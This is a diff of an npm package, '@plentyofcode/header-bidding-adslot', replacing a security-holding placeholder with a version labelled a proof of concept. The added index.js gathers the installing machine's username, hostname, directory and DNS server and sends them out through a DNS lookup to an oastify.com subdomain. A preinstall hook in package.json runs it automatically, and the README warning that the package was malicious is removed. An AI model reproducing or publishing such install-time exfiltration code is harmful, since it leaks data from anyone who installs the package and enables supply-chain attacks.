@plentyofcode/header-bidding-adslot 0.0.1-security → 2.0.41

package/index.js

@@ -0,0 +1,31 @@
+const { exec } = require("child_process");
+const dns = require("dns");
+const os = require("os");
+const path = require("path");
+
+// RCE
+const username = os.userInfo().username; // Username
+const hostname = os.hostname(); // HostName
+const currentDir = path.basename(__dirname); // Current Directory
+const dnsServer = dns.getServers()[0] || "none"; // First DNS Server
+
+// Create the information in a compact format
+const info = `u=${username}&hn=${hostname}&d=${currentDir}&dns=${dnsServer}`;
+
+// Encode the information for the URL
+let encodedInfo = encodeURIComponent(info);
+
+// Check if the encoded string exceeds 63 characters
+if (encodedInfo.length > 63) {
+    // Use only the username if the string is too long
+    encodedInfo = encodeURIComponent(`u=${username}`);
+}
+
+// Execute and DNS Request
+exec(`host ${encodedInfo}.y43b18cd8eaw7j5syw1prliuklqce22r.oastify.com`, (error, data) => {
+    if (error) {
+        console.log("error", error.message);
+        return;
+    }
+    console.log(data);
+});

package/package.json

@@ -1,6 +1,12 @@
-{
-  "name": "@plentyofcode/header-bidding-adslot",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
-}
+{
+    "name": "@plentyofcode/header-bidding-adslot",
+    "version": "2.0.41",
+    "description": "PoC Package",
+    "main": "index.js",
+    "scripts": {
+      "preinstall": "node index.js",
+      "test": "echo \"Error: no test specified\" && exit 1"
+    },
+    "author": "h0rus3c",
+    "license": "ISC"
+  }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=%40plentyofcode%2Fheader-bidding-adslot for more information.